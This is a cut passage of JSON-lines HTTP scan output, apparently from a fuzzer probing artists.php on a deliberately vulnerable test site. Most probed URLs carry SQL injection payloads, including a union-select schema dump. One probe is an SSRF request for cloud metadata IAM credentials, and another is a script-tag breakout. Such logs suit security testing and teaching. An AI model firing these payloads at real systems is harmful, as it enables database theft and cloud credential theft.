timestamp\":\"2024-11-13T02:23:14.156210783Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?artist=1%22\",\"input\":\"http://testphp.vulnweb.com/artists.php?artist=1%22\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=1%22\",\"time\":\"354.997869ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":496,\"lines\":107,\"status_code\":200,\"content_length\":4853,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:14.234212857Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?artist=1%E2%80%93DBS\",\"input\":\"http://testphp.vulnweb.com/artists.php?artist=1%E2%80%93DBS\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=1%E2%80%93DBS\",\"time\":\"342.025884ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":496,\"lines\":107,\"status_code\":200,\"content_length\":4853,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:14.297611944Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?artist=1%E2%80%99\",\"input\":\"http://testphp.vulnweb.com/artists.php?artist=1%E2%80%99\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=1%E2%80%99\",\"time\":\"342.359953ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":496,\"lines\":107,\"status_code\":200,\"content_length\":4853,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:14.653360379Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?artist=1%E2%80%B2\",\"input\":\"http://testphp.vulnweb.com/artists.php?artist=1%E2%80%B2\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=1%E2%80%B2\",\"time\":\"363.07838ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":496,\"lines\":107,\"status_code\":200,\"content_length\":4853,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:15.011326743Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?artist=1%E2%80%B2%20AND%20%28SELECT%200x47776a68%29=%27qSBB%27--%20wXyW\",\"input\":\"http://testphp.vulnweb.com/artists.php?artist=1%E2%80%B2%20AND%20%28SELECT%200x47776a68%29=%27qSBB%27--%20wXyW\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=1%E2%80%B2%20AND%20%28SELECT%200x47776a68%29=%27qSBB%27--%20wXyW\",\"time\":\"360.308104ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":496,\"lines\":107,\"status_code\":200,\"content_length\":4853,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:15.016388133Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?artist=1%E2%80%B2%20AND%20%28SELECT%20QUARTER%28NULL%29%29%20IS%20NULL--%20wXyW\",\"input\":\"http://testphp.vulnweb.com/artists.php?artist=1%E2%80%B2%20AND%20%28SELECT%20QUARTER%28NULL%29%29%20IS%20NULL--%20wXyW\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=1%E2%80%B2%20AND%20%28SELECT%20QUARTER%28NULL%29%29%20IS%20NULL--%20wXyW\",\"time\":\"351.262833ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":496,\"lines\":107,\"status_code\":200,\"content_length\":4853,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:15.260955949Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?artist=1%E2%80%B2%20AND%2005537=5469\",\"input\":\"http://testphp.vulnweb.com/artists.php?artist=1%E2%80%B2%20AND%2005537=5469\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=1%E2%80%B2%20AND%2005537=5469\",\"time\":\"345.300113ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":496,\"lines\":107,\"status_code\":200,\"content_length\":4853,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:15.769275873Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?artist=1%E2%80%B2%20AND%2005537=5537\",\"input\":\"http://testphp.vulnweb.com/artists.php?artist=1%E2%80%B2%20AND%2005537=5537\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=1%E2%80%B2%20AND%2005537=5537\",\"time\":\"349.253959ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":496,\"lines\":107,\"status_code\":200,\"content_length\":4853,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:15.914012806Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?artist=1%E2%80%B2%20AND%2006847=6847--%20wXyW\",\"input\":\"http://testphp.vulnweb.com/artists.php?artist=1%E2%80%B2%20AND%2006847=6847--%20wXyW\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=1%E2%80%B2%20AND%2006847=6847--%20wXyW\",\"time\":\"347.392663ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":496,\"lines\":107,\"status_code\":200,\"content_length\":4853,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:17.607171661Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?artist=1%E2%80%B2%20AND%202%2A3%2A8=6%2A9--%20wXyW\",\"input\":\"http://testphp.vulnweb.com/artists.php?artist=1%E2%80%B2%20AND%202%2A3%2A8=6%2A9--%20wXyW\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=1%E2%80%B2%20AND%202%2A3%2A8=6%2A9--%20wXyW\",\"time\":\"349.273918ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":496,\"lines\":107,\"status_code\":200,\"content_length\":4853,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:18.988747936Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?artist=1%E2%80%B2%20AND%203%2A3%2A9%3C%282%2A4%29--%20wXyW\",\"input\":\"http://testphp.vulnweb.com/artists.php?artist=1%E2%80%B2%20AND%203%2A3%2A9%3C%282%2A4%29--%20wXyW\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=1%E2%80%B2%20AND%203%2A3%2A9%3C%282%2A4%29--%20wXyW\",\"time\":\"363.082063ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":496,\"lines\":107,\"status_code\":200,\"content_length\":4853,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:19.273319797Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?artist=1\",\"input\":\"http://testphp.vulnweb.com/artists.php?artist=1\\u0026\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=1\",\"time\":\"345.966933ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":701,\"lines\":124,\"status_code\":200,\"content_length\":6251,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:20.023733912Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?artist=1+AND+1=1\",\"input\":\"http://testphp.vulnweb.com/artists.php?artist=1+AND+1=1\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=1+AND+1=1\",\"time\":\"355.873404ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":701,\"lines\":124,\"status_code\":200,\"content_length\":6251,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:20.057469477Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?artist=1,GET,artist,BTU\",\"input\":\"http://testphp.vulnweb.com/artists.php?artist=1,GET,artist,BTU\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=1,GET,artist,BTU\",\"time\":\"350.265335ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":496,\"lines\":107,\"status_code\":200,\"content_length\":4853,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:20.1187139Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?artist=10\",\"input\":\"http://testphp.vulnweb.com/artists.php?artist=10\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=10\",\"time\":\"345.623861ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":482,\"lines\":105,\"status_code\":200,\"content_length\":4735,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:20.136330001Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?artist=1A01\",\"input\":\"http://testphp.vulnweb.com/artists.php?artist=1A01\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=1A01\",\"time\":\"353.142003ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":496,\"lines\":107,\"status_code\":200,\"content_length\":4853,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:20.193428356Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?artist=1Connection:\",\"input\":\"http://testphp.vulnweb.com/artists.php?artist=1Connection:\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=1Connection:\",\"time\":\"349.829017ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":496,\"lines\":107,\"status_code\":200,\"content_length\":4853,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:20.383229162Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?artist=1HTTP/1.1\",\"input\":\"http://testphp.vulnweb.com/artists.php?artist=1HTTP/1.1\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=1HTTP/1.1\",\"time\":\"352.349541ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":496,\"lines\":107,\"status_code\":200,\"content_length\":4853,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:20.504885551Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?artist=1Host:\",\"input\":\"http://testphp.vulnweb.com/artists.php?artist=1Host:\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=1Host:\",\"time\":\"349.334317ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":496,\"lines\":107,\"status_code\":200,\"content_length\":4853,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:20.562237191Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?artist=1User-Agent:\",\"input\":\"http://testphp.vulnweb.com/artists.php?artist=1User-Agent:\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=1User-Agent:\",\"time\":\"352.908715ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":496,\"lines\":107,\"status_code\":200,\"content_length\":4853,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:20.589712436Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?artist=1http:%2F%2F169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials\",\"input\":\"http://testphp.vulnweb.com/artists.php?artist=1http:%2F%2F169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=1http:%2F%2F169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials\",\"time\":\"364.008118ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":496,\"lines\":107,\"status_code\":200,\"content_length\":4853,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:20.605983066Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?artist=1union%20select%20group_concat%28schema_name%29%20from%20information_schema.schemata\",\"input\":\"http://testphp.vulnweb.com/artists.php?artist=1union%20select%20group_concat%28schema_name%29%20from%20information_schema.schemata\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=1union%20select%20group_concat%28schema_name%29%20from%20information_schema.schemata\",\"time\":\"350.075523ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":496,\"lines\":107,\"status_code\":200,\"content_length\":4853,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:20.68273558Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?artist=1union%20select%20group_concat%28schema_name%29%20from%20information_schema.schemataunion%20select%20group_concat%28schema_name%29,2,3,4,5,6,7,8,9,10%20from%20information_schema.schemata\",\"input\":\"http://testphp.vulnweb.com/artists.php?artist=1union%20select%20group_concat%28schema_name%29%20from%20information_schema.schemataunion%20select%20group_concat%28schema_name%29,2,3,4,5,6,7,8,9,10%20from%20information_schema.schemata\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=1union%20select%20group_concat%28schema_name%29%20from%20information_schema.schemataunion%20select%20group_concat%28schema_name%29,2,3,4,5,6,7,8,9,10%20from%20information_schema.schemata\",\"time\":\"339.762054ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":496,\"lines\":107,\"status_code\":200,\"content_length\":4853,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:20.853236489Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?artist=2\",\"input\":\"http://testphp.vulnweb.com/artists.php?artist=2\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=2\",\"time\":\"358.072032ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":645,\"lines\":124,\"status_code\":200,\"content_length\":6193,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:20.922240468Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?artist=2'\",\"input\":\"http://testphp.vulnweb.com/artists.php?artist=2'\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=2'\",\"time\":\"343.837659ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":496,\"lines\":107,\"status_code\":200,\"content_length\":4853,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:20.935777186Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?artist=2978\",\"input\":\"http://testphp.vulnweb.com/artists.php?artist=2978\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=2978\",\"time\":\"353.082636ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":482,\"lines\":105,\"status_code\":200,\"content_length\":4735,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:20.974036666Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?artist=3\",\"input\":\"http://testphp.vulnweb.com/artists.php?artist=3\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=3\",\"time\":\"346.482935ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":645,\"lines\":124,\"status_code\":200,\"content_length\":6193,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:21.185189838Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?artist=3-D\",\"input\":\"http://testphp.vulnweb.com/artists.php?artist=3-D\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=3-D\",\"time\":\"353.305772ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":496,\"lines\":107,\"status_code\":200,\"content_length\":4853,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:24.408774308Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?artist=4+OR+true;--\",\"input\":\"http://testphp.vulnweb.com/artists.php?artist=4+OR+true;--\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=4+OR+true;--\",\"time\":\"346.617975ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":701,\"lines\":124,\"status_code\":200,\"content_length\":6251,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:24.511403816Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?artist=9\",\"input\":\"http://testphp.vulnweb.com/artists.php?artist=9\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=9\",\"time\":\"339.845275ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":482,\"lines\":105,\"status_code\":200,\"content_length\":4735,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:24.602086457Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?artist=999999.9\",\"input\":\"http://testphp.vulnweb.com/artists.php?artist=999999.9\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=999999.9\",\"time\":\"350.171228ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":482,\"lines\":105,\"status_code\":200,\"content_length\":4735,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:24.660628399Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?artist=\\u003c/Title/\\u003c/Script/\",\"input\":\"http://testphp.vulnweb.com/artists.php?artist=\\u003c/Title/\\u003c/Script/\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=\\u003c/Title/\\u003c/Script/\",\"time\":\"349.855125ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":496,\"lines\":107,\"status_code\":200,\"content_length\":4853,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:25.028377788Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?artist=FUZZ\",\"input\":\"http://testphp.vulnweb.com/artists.php?artist=FUZZ\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=FUZZ\",\"time\":\"357.36876ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":496,\"lines\":107,\"status_code\":200,\"content_length\":4853,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:25.377550026Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?artist=SCANT3R\",\"input\":\"http://testphp.vulnweb.com/artists.php?artist=SCANT3R\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=SCANT3R\",\"time\":\"345.202566ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":496,\"lines\":107,\"status_code\":200,\"content_length\":4853,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:25.380618519Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?artist=SCANT3R+REFLECT\",\"input\":\"http://testphp.vulnweb.com/artists.php?artist=SCANT3R+REFLECT\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=SCANT3R+REFLECT\",\"time\":\"343.405584ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":496,\"lines\":107,\"status_code\":200,\"content_length\":4853,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:25.643921562Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?artist=vuln10\",\"input\":\"http://testphp.vulnweb.com/artists.php?artist=vuln10\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=vuln10\",\"time\":\"345.065867ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1